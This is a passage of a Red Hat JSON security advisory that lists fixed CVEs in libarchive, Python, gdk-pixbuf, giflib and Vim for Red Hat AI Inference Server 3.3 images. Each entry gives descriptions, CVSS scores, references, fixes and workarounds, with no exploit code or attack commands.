"text": "The Red Hat Product Security team would likely assess the severity of this vulnerability as High because it allows remote attackers to cause a persistent denial-of-service condition using a small crafted archive file. Successful exploitation requires no authentication, no special configuration, and no user interaction in environments that automatically process uploaded archives. By repeatedly submitting malicious archives, an attacker can exhaust CPU resources or worker threads in services such as file upload systems, CI/CD pipelines, mail scanners, and content indexing services that rely on libarchive for archive extraction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4111"
},
{
"category": "external",
"summary": "RHBZ#2446453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446453"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4111"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4111",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4111"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2877",
"url": "https://github.com/libarchive/libarchive/pull/2877"
}
],
"release_date": "2026-03-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: Infinite Loop Denial of Service in RAR5 Decompression via archive_read_data() in libarchive"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4424",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-03-19T12:22:21.740000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449006"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This heap out-of-bounds read vulnerability in libarchive\u0027s RAR archive processing logic can lead to information disclosure. A remote attacker can exploit this flaw by providing a specially crafted RAR archive, potentially revealing sensitive heap memory information without requiring authentication or user interaction on systems that process untrusted archives.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "RHBZ#2449006",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4424",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4424"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2898",
"url": "https://github.com/libarchive/libarchive/pull/2898"
}
],
"release_date": "2026-03-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing"
},
{
"cve": "CVE-2026-4519",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-03-20T16:02:13.494105+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449649"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "RHBZ#2449649",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4519"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/143930",
"url": "https://github.com/python/cpython/issues/143930"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/143931",
"url": "https://github.com/python/cpython/pull/143931"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/"
}
],
"release_date": "2026-03-20T15:08:32.576000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-5121",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-30T07:40:25.358335+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2452945"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: An integer overflow flaw in `libarchive` on 32-bit systems can lead to a heap buffer overflow. This vulnerability occurs when processing a specially crafted ISO9660 image, allowing an attacker to potentially execute arbitrary code. Red Hat Enterprise Linux 64-bit systems are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "RHBZ#2452945",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc",
"url": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2934",
"url": "https://github.com/libarchive/libarchive/pull/2934"
}
],
"release_date": "2026-03-30T07:44:15.222000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "To mitigate this issue, avoid processing untrusted ISO9660 images with applications that utilize `libarchive`. Users should only extract or read content from ISO images obtained from trusted sources.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing"
},
{
"acknowledgments": [
{
"names": [
"Ka\u011fan \u00c7apar"
]
}
],
"cve": "CVE-2026-5201",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2026-03-31T07:17:23.696000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An Important heap-based buffer overflow flaw exists in the `gdk-pixbuf` library\u0027s JPEG image loader. This vulnerability can be triggered automatically without user interaction when processing a specially crafted JPEG image, such as during thumbnail generation. Successful exploitation leads to application crashes and denial-of-service conditions in applications utilizing `gdk-pixbuf` for image handling.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "RHBZ#2453291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5201",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5201"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304",
"url": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304"
}
],
"release_date": "2026-03-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "To reduce the risk of exploitation, avoid opening or processing untrusted JPEG image files. This operational control helps prevent the automatic triggering of the vulnerability, for example, during thumbnail generation, which could otherwise lead to application instability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image"
},
{
"cve": "CVE-2026-23868",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-03-10T20:01:10.215637+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "giflib: Giflib: Double-free vulnerability leading to memory corruption",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "RHBZ#2446207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23868",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23868"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7",
"url": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7"
},
{
"category": "external",
"summary": "https://www.facebook.com/security/advisories/cve-2026-23868",
"url": "https://www.facebook.com/security/advisories/cve-2026-23868"
}
],
"release_date": "2026-03-10T18:53:25.606000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "giflib: Giflib: Double-free vulnerability leading to memory corruption"
},
{
"cve": "CVE-2026-25749",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-09T11:08:59.061581+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437843"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open source, command line text editor. This heap buffer overflow vulnerability exists in the tag file resolution logic when processing the \u0027helpfile\u0027 option. A local user could exploit this by providing a specially crafted \u0027helpfile\u0027 option value, leading to a heap buffer overflow. This could result in arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via \u0027helpfile\u0027 option processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This MODERATE impact vulnerability in Vim\u0027s tag file resolution logic allows a local attacker to achieve a out-of-bounds write. By providing a specially crafted `helpfile` option value a local user can trigger a heap buffer overflow, as consequence lead to memory corruption presenting a data integrity impact or leading the vim process to crash resulting in availability impact. Although being non-trivial and very complex, arbitrary code execution is not discarded as worst case scenario.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
